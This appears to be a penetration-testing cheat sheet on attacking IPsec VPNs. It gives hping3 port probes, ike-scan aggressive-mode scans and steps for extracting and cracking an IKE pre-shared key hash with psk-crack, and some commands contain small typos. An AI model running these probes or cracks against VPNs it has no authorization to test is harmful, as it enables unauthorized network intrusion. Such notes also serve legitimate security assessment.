Attacking VPNs
The VPNs Hacker's Toolkit
IPsec tools: Used for building IPsec tunnels
IKE-scan: An IKE probing utility
PSK-crack: A tool for cracking PSKs used by IKE
OpenSSL: Client-server tools for SSL/TLS negotiations
VPN clients
VPN Hacking Methodology
Identify the VPN technology in use
Establish initial communications with the server; identify the authentication methods and encryption method in use
Perform a "handshake" with the server and look for information leaks.
Identify vulnerabilities for exploitation using leaked information.
Crafting Hping3 commands
# Send SYN packets
hping3 -S -p 53 <TargetIP>
# Send UDP packets to port 500 (used by IKE)
hping3 --udp -p 500 <TargetIP>
# Bash scripts that takes udp.txt and sends probes to each UDP port number listed
for port in `cat udp.txt`; do echo TESTING UDP PORT: $port; hping3 -2- p $port -c 1 <TargetIP>; done
IKE-scan
IKE-scan attempts to communicate using the IKE protocol
# IKE-scan
# Uses defaults: 3DES encryption, SHA1 Hash, PSK Authentication, DH Group 2
ike-scan <TargetIP>
# Default SAs
ike-scan --trans=5,2,1,2 <TargetIP>
# This command will use the following:
# DES-CBD Encryption, MD5 Hash, PSK Auth, DH Group 1
ike-scan --trans=1,1,1,1 <Target IP>
# Newer method for specifying transforms
ike-scan --trans="(1=5,2=2,3=1,4=2)" <TargetIP>
# Runs scan in aggressive mode
ike-scan -A <TargetIP>
# If aggressive return a Auth=PSK response then it might be vulnerable.
# Attempt to extract the key
ike-scan -A <TargetIP> --pskcrack=pskhash
# If previous command works you will have a file named pskhash
# Attempt to crack the hash
psk-crack pskhash
IKEmulti
ikemulti.py
tries multiple transforms
# Running ikemulti.py
python ikemulti.py -i <TargetIP>
Aggressive Mode
Main mode can be thought of as a normal way of exchanging information
Aggressive mode is designed to speed up the process and perform a faster handshake
Aggressive mode can leak information
If this mode is used with a PSK the key itself can actually be extracted and then cracked before being used to authenticate
Last updated